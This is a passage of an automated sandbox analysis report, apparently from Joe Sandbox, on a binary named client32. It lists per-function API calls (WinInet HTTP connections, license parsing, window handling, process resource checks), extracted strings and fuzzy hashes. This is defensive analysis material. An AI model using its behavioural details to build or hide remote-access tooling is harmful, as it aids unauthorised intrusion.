GetProcAddress 958->961 962 1102a094-1102a09d 958->962 961->962 966 1102a14e-1102a150 SetLastError 961->966 970 1102a0a0-1102a0a2 962->970 963->964 967 1102a1b7-1102a1b9 SetLastError 963->967 964->948 968 1102a156-1102a15d 966->968 967->948 972 1102a16c-1102a18d call 11027f00 * 2 968->972 970->968 974 1102a0a8-1102a0ad 970->974 972->957 974->972 978 1102a0b3-1102a0ef call 11110230 call 11027eb0 974->978 976->977 980 11029e44-11029e49 977->980 981 11029e1b-11029e1d 977->981 1000 1102a101-1102a103 978->1000 1001 1102a0f1-1102a0f4 978->1001 983 11029e4b-11029e5c GetProcAddress 980->983 984 11029e5e-11029e75 InternetConnectA 980->984 986 11029e34-11029e3a 981->986 987 11029e1f-11029e32 GetProcAddress 981->987 983->984 989 11029ea1-11029eac SetLastError 983->989 990 1102a017-1102a027 call 11162777 984->990 991 11029e7b-11029e7e 984->991 986->980 987->986 993 11029e3c-11029e3e SetLastError 987->993 989->990 990->931 996 11029e80-11029e82 991->996 997 11029eb9-11029ec1 991->997 993->980 1002 11029e84-11029e97 GetProcAddress 996->1002 1003 11029e99-11029e9f 996->1003 1004 11029ec3-11029ed7 GetProcAddress 997->1004 1005 11029ed9-11029ef4 997->1005 1008 1102a105 1000->1008 1009 1102a10c-1102a111 1000->1009 1001->1000 1007 1102a0f6-1102a0fa 1001->1007 1002->1003 1010 11029eb1-11029eb3 SetLastError 1002->1010 1003->997 1004->1005 1011 11029ef6-11029efe SetLastError 1004->1011 1012 11029f01-11029f04 1005->1012 1007->1000 1013 1102a0fc 1007->1013 1008->1009 1014 1102a113-1102a129 call 110d12e0 1009->1014 1015 1102a12c-1102a12e 1009->1015 1010->997 1011->1012 1018 1102a012-1102a015 1012->1018 1019 11029f0a-11029f0f 1012->1019 1013->1000 1014->1015 1021 1102a130-1102a132 1015->1021 1022 1102a134-1102a145 call 11162777 1015->1022 1018->990 1025 1102a03c-1102a049 call 11162777 1018->1025 1023 11029f11-11029f28 GetProcAddress 1019->1023 1024 11029f2a-11029f36 1019->1024 1021->1022 1027 1102a15f-1102a169 call 11162777 1021->1027 1022->972 1037 1102a147-1102a149 1022->1037 1023->1024 
1029 11029f38-11029f40 SetLastError 1023->1029 1036 11029f42-11029f5b GetLastError 1024->1036 1025->940 1027->972 1029->1036 1038 11029f76-11029f8b 1036->1038 1039 11029f5d-11029f74 GetProcAddress 1036->1039 1037->958 1042 11029f95-11029fa3 GetLastError 1038->1042 1039->1038 1040 11029f8d-11029f8f SetLastError 1039->1040 1040->1042 1043 11029fa5-11029faa 1042->1043 1044 11029fac-11029fb8 GetDesktopWindow 1042->1044 1043->1044 1047 1102a002-1102a007 1043->1047 1045 11029fd3-11029fef 1044->1045 1046 11029fba-11029fd1 GetProcAddress 1044->1046 1045->1018 1051 11029ff1 1045->1051 1046->1045 1048 11029ff6-1102a000 SetLastError 1046->1048 1047->1018 1049 1102a009-1102a00f 1047->1049 1048->1018 1049->1018 1051->1012
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(WinInet.dll,1B702977,757323A0,?,00000000), ref: 11029BE5
                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                                • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                                • _malloc.LIBCMT ref: 11029CB7
                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                                • GetLastError.KERNEL32 ref: 11029CF2
                                                                                • _free.LIBCMT ref: 11029CFE
                                                                                • _malloc.LIBCMT ref: 11029D07
                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                                • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                                • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                                • _free.LIBCMT ref: 11029DA5
                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                                • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                                • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                                • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                                • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                                • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                                • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
                                                                                • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
                                                                                • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                                • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                • API String ID: 921868004-913974648
                                                                                • Opcode ID: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
                                                                                • Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
                                                                                • Opcode Fuzzy Hash: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
                                                                                • Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60
                                                                                APIs
                                                                                  • Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                  • Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                • _fgets.LIBCMT ref: 110628E2
                                                                                • _strpbrk.LIBCMT ref: 11062949
                                                                                • _fgets.LIBCMT ref: 11062A4C
                                                                                • _strpbrk.LIBCMT ref: 11062AC3
                                                                                • __wcstoui64.LIBCMT ref: 11062ADC
                                                                                • _fgets.LIBCMT ref: 11062B55
                                                                                • _strpbrk.LIBCMT ref: 11062B7B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                • API String ID: 716802716-1571441106
                                                                                • Opcode ID: 742ea8bdf19e8cca6d5bd37e3cbea73eeb9325f4fe67667d5bccebbacef3dcd8
                                                                                • Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
                                                                                • Opcode Fuzzy Hash: 742ea8bdf19e8cca6d5bd37e3cbea73eeb9325f4fe67667d5bccebbacef3dcd8
                                                                                • Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91

                                                                                Control-flow Graph

                                                                                Control-flow graph of function 11139ed0 (basic blocks 11139ed0-1113a5b5; rendered graph omitted, API calls listed below)
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 11139F07
                                                                                • IsWindow.USER32(00040310), ref: 11139F65
                                                                                • IsWindowVisible.USER32(00040310), ref: 11139F73
                                                                                • IsWindowVisible.USER32(00040310), ref: 11139FAB
                                                                                • GetForegroundWindow.USER32 ref: 11139FC6
                                                                                • EnableWindow.USER32(00040310,00000000), ref: 11139FE0
                                                                                • EnableWindow.USER32(00040310,00000001), ref: 11139FFC
                                                                                • SetForegroundWindow.USER32(00000000), ref: 1113A00B
                                                                                • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 1113A049
                                                                                • IsWindowVisible.USER32(00000000), ref: 1113A058
                                                                                • IsWindowVisible.USER32(00040310), ref: 1113A088
                                                                                • IsIconic.USER32(00040310), ref: 1113A095
                                                                                • GetForegroundWindow.USER32 ref: 1113A09F
                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(00040310,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(00040310,11139EA2,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132156
                                                                                • SetForegroundWindow.USER32(00000000), ref: 1113A0C5
                                                                                • EnableWindow.USER32(00040310,00000001), ref: 1113A0D4
                                                                                • GetLastError.KERNEL32 ref: 1113A193
                                                                                • GetLastError.KERNEL32 ref: 1113A20B
                                                                                • GetTickCount.KERNEL32 ref: 1113A4B8
                                                                                • GetTickCount.KERNEL32 ref: 1113A4D9
                                                                                  • Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,1113A522), ref: 110261A8
                                                                                • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                • API String ID: 2511061093-2542869446
                                                                                • Opcode ID: e14826bbac3d3f7ee8e0918d09fc5866bd4c7377ec69909a935bcd746c51be63
                                                                                • Instruction ID: 9ececd2581658abecd2b9d282a3ee437682ea2591524154b6e9732358788741a
                                                                                • Opcode Fuzzy Hash: e14826bbac3d3f7ee8e0918d09fc5866bd4c7377ec69909a935bcd746c51be63
                                                                                • Instruction Fuzzy Hash: FC023675E11226DFE716DFA4DD94BAAFB65BBC131EF140138E4219728CEB30A844CB91

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                Control-flow graph of function 11134830 (basic blocks 11134830-11134baf; rendered graph omitted, API calls listed below)
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,1B702977), ref: 1113489E
                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
                                                                                • GetCurrentProcess.KERNEL32 ref: 11134937
                                                                                • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
                                                                                • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
                                                                                • SetLastError.KERNEL32(00000078), ref: 11134978
                                                                                • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
                                                                                • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
                                                                                • SetLastError.KERNEL32(00000078), ref: 111349D9
                                                                                • SetLastError.KERNEL32(00000078), ref: 111349E6
                                                                                • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
                                                                                • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
                                                                                • SetLastError.KERNEL32(00000078), ref: 11134A11
                                                                                • FreeLibrary.KERNEL32(?), ref: 11134B7B
                                                                                • FreeLibrary.KERNEL32(?), ref: 11134B88
                                                                                • FreeLibrary.KERNEL32(?), ref: 11134B92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                • API String ID: 263027137-1001504656
                                                                                • Opcode ID: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                • Instruction ID: db8711c19b503e7e72fae74a2cc3466c9a493194fb08fa6cc11ddefe45185306
                                                                                • Opcode Fuzzy Hash: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                • Instruction Fuzzy Hash: 27B1AE78E402699FDB10CFE9CD80BADFBB5EB88319F104429E419E7648DB749884CB55
                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • _memset.LIBCMT ref: 11145CFD
                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                • _strncpy.LIBCMT ref: 11145DCA
                                                                                  • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                • RegCloseKey.KERNEL32(00000000), ref: 11145E66
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                • API String ID: 3299820421-2117887902
                                                                                • Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                • Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
                                                                                • Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                • Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 111168D5
                                                                                • CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000,?,00000000,Client,silent,00000000,00000000,?,1104C49F), ref: 111168EF
                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11116914
                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11116926
                                                                                • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
                                                                                • CoUninitialize.COMBASE(00000000), ref: 111169E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                • String ID: SHELL32.DLL$SHGetSettings
                                                                                • API String ID: 4195908086-2348320231
                                                                                • Opcode ID: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                • Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
                                                                                • Opcode Fuzzy Hash: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                • Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _memset
• String ID: NBCTL32.DLL$_License$serial_no
• API String ID: 2102423945-35127696
• Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
• Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
• Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
• Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90
APIs
• SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
